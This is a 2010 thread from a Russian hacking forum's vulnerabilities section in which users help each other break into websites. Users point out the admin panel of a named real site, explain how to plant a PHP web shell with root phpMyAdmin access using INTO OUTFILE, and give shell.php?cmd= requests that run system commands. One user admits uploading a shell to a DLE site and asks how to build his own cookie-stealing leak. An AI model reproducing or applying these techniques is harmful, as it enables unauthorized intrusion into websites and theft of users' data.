HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.11.2010, 11:25
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Вот скрипт от Dr.Z3r0:

Цитата:
Сообщение от Dr.Z3r0  
Скрипт для вывода инфы через LIMIT или еще что нибудь этого рода
Код:

Крутит через лимит запросы.
 
Ответить с цитированием

  #2  
Старый 15.11.2010, 12:12
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами: 8268086

Репутация: 7
По умолчанию

Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.

например /:



Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?
 
Ответить с цитированием

  #3  
Старый 15.11.2010, 12:26
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от freezed  
Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
например /:

Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий?
Ссылку дайте, видимо у вас что-то с кодировкой.
 
Ответить с цитированием

  #4  
Старый 15.11.2010, 12:51
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами: 8268086

Репутация: 7
По умолчанию

Думаю, что с кодировкой все нормально, так как с чтением файлов проблем нет.
 
Ответить с цитированием

  #5  
Старый 15.11.2010, 19:26
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами: 9116636

Репутация: 39
По умолчанию

Привет, подскажите плз, где админка в http://www.runiga.ru/ ?
 
Ответить с цитированием

  #6  
Старый 15.11.2010, 21:13
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами: 8836437

Репутация: 136
По умолчанию

http://www.runiga.ru/panel/
 
Ответить с цитированием

  #7  
Старый 16.11.2010, 04:10
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами: 9761387

Репутация: 2
По умолчанию

Народ) кто знает почему такие траблы при залитии шелла через phpmyadmin

Вообщем имею доступ к пхпмайадмин под root'om с полными правами.

хочу залить шелл.

Мучу такой запрос:

Цитата:
Сообщение от None  
CREATE TABLE `tableshell` (`shell` TEXT);
Цитата:
Сообщение от None  
INSERT INTRO `tableshell` (`shell`) VALUES ('')
После второго запроса получаю такую ошибку:

Цитата:
Сообщение от None  
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`tableshell` (`shell`) VALUES (''' at line 1
Кто знает почему вылазит эта ошибка?

Пробовал другой выриант:

Цитата:
Сообщение от None  
select '' from mysql.user into outfile 'E:/www.site.ru/shell.php'
Создается файл в корневой директории сайта.

Но при запросе http://www.site.ru/shell.php?cmd=dir получаю такую ошибку :

Цитата:
Сообщение от None  
Parse error: syntax error, unexpected $end in E:\www.site.ru\shell.php(1) : eval()'d code on line 1
Что не так делаю? = \
 
Ответить с цитированием

  #8  
Старый 16.11.2010, 06:04
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

GroM88


В первом случае у тебя нарушен синтаксис, верный запрос выглядит так:

PHP код:
[COLOR="#000000"]INSERT INTRO `tableshell` (`shell`) VALUES ("[COLOR="#0000BB"][/COLOR]")

[/COLOR
А если учесть, что не на всех серверах включена директива short_open_tag, то так:

PHP код:
[COLOR="#000000"]INSERT INTRO `tableshell` (`shell`) VALUES ("[COLOR="#0000BB"][/COLOR]")

[/COLOR
Не забывай, что при таком методе залития, директива allow_url_include - должна находиться в положении On, иначе шелл не проинклудится.

Во втором случае, нарушен синтаксис и отсутствует логика.

Во первых, после команды нужна точка с запятой, например для вывода phpinfo синтаксически верным был бы такой запрос:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=phpinfo();

[/COLOR][/COLOR
Во вторых, если ты собираешься вызывать системные команды, а не просто эвалить php код (команда dir, является системной командой Windows), то нужно использовать соответствующие функции, либо заключать команды в тильды (``), чтобы php понимал, что эту команду нужно выполнить, как команду оболочки.

О функциях исполнения системных команд и их различиях, можешь почитать тут http://www.php.su/functions/?cat=exec

Вывод листинга директорий для Windows систем, c учетом кода, что ты залил, можно получить одним из следующих запросов (если конечно соответствующие функции не отключены на сервере или не включен safe mod):

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=echo `dir`;

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=passthru('dir');

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=system('dir');

[/COLOR][/COLOR
 
Ответить с цитированием

  #9  
Старый 16.11.2010, 12:08
spiderbuber
Познающий
Регистрация: 20.10.2010
Сообщений: 61
С нами: 8190326

Репутация: 0
По умолчанию

Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ((!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_password'[/COLOR][COLOR="#007700"]])) and ([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]"ИП_ЖЕРТВЫ"[/COLOR][COLOR="#007700"]) ) {

echo

[/COLOR][COLOR="#007700"]HTML;

}[/
COLOR][/COLOR
Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив?
 
Ответить с цитированием

  #10  
Старый 16.11.2010, 14:43
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами: 8285366

Репутация: 62
По умолчанию

Цитата:
Сообщение от spiderbuber  
Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ((!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_password'[/COLOR][COLOR="#007700"]])) and ([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]"ИП_ЖЕРТВЫ"[/COLOR][COLOR="#007700"]) ) {

echo

[/COLOR][COLOR="#007700"]HTML;

}[/
COLOR][/COLOR
Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив?
это больше на накрутку чего то тянет, по указанному выше адресу попадаем на страницу с фреймом где по идее юзеру парят примерно следующие куки

Set-Cookie: SL_003_0000=_10000_; domain=telefon4je.info; path=/; expires=Sat, 20-Nov-2010 18:35:15 GMT

Set-Cookie: TSUSER=003; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=telefon4je.info

Set-Cookie: SL_2_0000=_0_; domain=telefon4je.info; path=/; expires=Wed, 17-Nov-2010 14:35:15 GMT и переадресовывают 302 редиректом сюда new-xmading.ru
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.